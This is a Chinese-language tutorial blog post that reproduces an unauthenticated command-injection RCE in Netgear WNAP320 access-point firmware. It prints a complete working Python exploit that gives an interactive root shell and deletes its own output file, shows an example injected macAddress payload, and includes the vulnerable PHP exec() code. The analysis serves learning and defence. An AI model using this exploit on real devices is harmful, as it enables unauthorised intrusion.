[零基础学IoT Pwn] 复现Netgear WNAP320 RCE
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE
0x00 前言:
这是[零基础学IoT Pwn]的第二篇,上篇我们搭好了仿真环境后,模拟运行了Netgear WNAP320
固件,所以这次就直接进行实战,在实战中进行零基础的学习哈哈哈。
0x01 Bug搜索:
搜索bug的方式有很多,比如在线网站https://www.exploit-db.com/,或者直接百度搜对应的路由器型号,我这边用的是searchsploit
进行搜索。
可以看到有要给匹配的bug macAddress
远程代码执行,并且还有对应的POC。
0x02 POC分析:
poc如下:
# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
# Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# IoT Device: Netgear WNAP320 Access Point
# Version: WNAP320 Access Point Firmware v2.0.3
import requests
import sys
if(len(sys.argv) != 2):
print('Must specify the IP parameter')
print("eg: python3 wnap320_v2_0_3.py <IP>")
sys.exit(0)
host = sys.argv[1]
port = 80
cmd = ''
while(True):
cmd = input('Shell_CMD$ ')
#injecting system command part writing the command output to a output file
data = {
'macAddress' : '112233445566;' + cmd + ' > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
if(response.ok):
#read the command output result
url = 'http://' + host + '/output'
cmdOutput = requests.get(url)
print(cmdOutput.text)
#remove trace
cmd = 'rm ./output'
data = {
'macAddress' : '112233445566;' + cmd + ' #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
else:
print('[!] No response from the server.')
运行结果如下:(可以成功获取到shell并且是root权限的)
接下来详细的分析下这个POC。
代码分析
首先看到这一段,这里利用input接受用户输入的命令,然后这个data是一个json数据,正常的话应该是macAddress:MAC地址
、reginfo:0
、writeData:submit
,但是由于他存在命令注入的漏洞,所以我们可以把命令注入到macAddress
的值当中造成任意命令执行。
cmd = input('Shell_CMD$ ')
#injecting system command part writing the command output to a output file
data = {
'macAddress' : '112233445566;' + cmd + ' > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
}
{
'macAddress': '112233445566;whoami > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
}//"利用分号拼接上命令并且重定向输出到 output文件中"
接下来分析这个片段,可以看到漏洞出现在http://192.168.0.100/boardDataWW.php
这个页面,python里面用post将数据包发送过去,然后接着在去请求用命令行输出的output文件(命令行会显),最后再次调用漏洞删除output这个回显文本,完成一次远程代码执行。
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
if(response.ok):
#read the command output result
url = 'http://' + host + '/output'
cmdOutput = requests.get(url)
print(cmdOutput.text)
#remove trace
cmd = 'rm ./output'
data = {
'macAddress' : '112233445566;' + cmd + ' #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
else:
print('[!] No response from the server.')
0x03 手动复现学习:
在没有登陆路由器的情况可以直接访问http://192.168.0.100/boardDataWW.php,所以导致这款路由器可以未授权RCE。
这里随便填个数据,然后用burp抓个包看看。
这里Web前端有检测Mac地址的格式,格式应为:112233445566。
数据包格式如下:
手动测试下命令执行的bug。
0x04 漏洞原理:
首先我们在固件包里面获取到boardDataWW.php
文件,然后对其源码进行分析。
首先是在php文件里面的html代码,这里是一个表单,有一个文本框macAddress
,内容有用户输入。当我们点击submit提交按钮的时候,会响应checkMAC
函数。
<body align="center">
<form name="hiddenForm" action="boardDataWW.php" method="post" align="center">
<td width="70%">
<input type="text" id="macAddress" name="macAddress" label="MAC Address" value="<?php echo $_REQUEST['macAddress'] ?>" onasdf="checkMAC(this.value);">
<small>* Format: xxxxxxxxxxxx (x = Hex String)</small>
</td>
<td width="30%" class="right">
<input type="submit" name="writeData" value="Submit" onclick="checkMAC(event, document.getElementById('macAddress').value);">
</td>
<td width="70%"><input type="reset" name="reset" value="Reset Form"></td>
</form>
</body>
checkMAC函数的主要功能是判断用户输入的MAC地址格式是否正确,包括12个字符并且是数字和字母的字符。
<html>
<head>
<title>Netgear</title>
<script type="text/javascript">
<!--
function checkMAC(eventobj,mac) {
if (!(/^[0-9A-Fa-f]{12,12}$/.test(mac))) {
.....
}
</script>
</head>
</html>
然后提交表单后会执行这段php的代码,他先是进行了数据包里面的判断,判断writeData
d的数据是否为空,如果不为空则继续判断mac地址数据是否为空并且判断reginfo的数据是否为空,然后这里又判断了一次mac地址的格式是否正确,如果这些条件都正确后进入分支执行接下来的代码。
接着出现了造成漏洞的代码,在php里调用了exec函数。
<?php
$flag=false;
$msg='';
if (!empty($_REQUEST['writeData'])) {
//进行mac地址输入格式的判断,比如格式满足[0-9a-fA-F]字符串。
if (!empty($_REQUEST['macAddress']) && array_search($_REQUEST['reginfo'],Array('WW'=>'0','NA'=>'1'))!==false && ereg("[0-9a-fA-F]{12,12}",$_REQUEST['macAddress'],$regs)!==false)
{
//这里因为直接把macAddress与命令进行了拼接,所以导致了存在命令注入的漏洞!
exec("wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo'],$dummy,$res);
if ($res==0) {
conf_set_buffer("system:basicSettings:apName netgear".substr($_REQUEST['macAddress'], -6)."\n");
conf_save();
$msg = 'Update Success!';
$flag = true;
}
}
else
$flag = true;
}
?>
然后调用exec执行"wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo']
,这里可以看到他拼接了用户输入的内容
并且当成命令执行,这就会出现命令注入漏洞
。
wr_mfg_data
是一个改变MAC地址的程序。
而当我们注入MAC地址的时候,我们再用;分号来添加一个额外执行的命令,那两条命令都会被执行。
0x05 PWN菜鸡小分队
欢迎来群里讨论PWN技巧、RE逆向。
本文来自博客园,作者:VxerLee,转载请注明原文链接:https://www.cnblogs.com/VxerLee/p/16434463.html 专注逆向、网络安全 ——VxerLee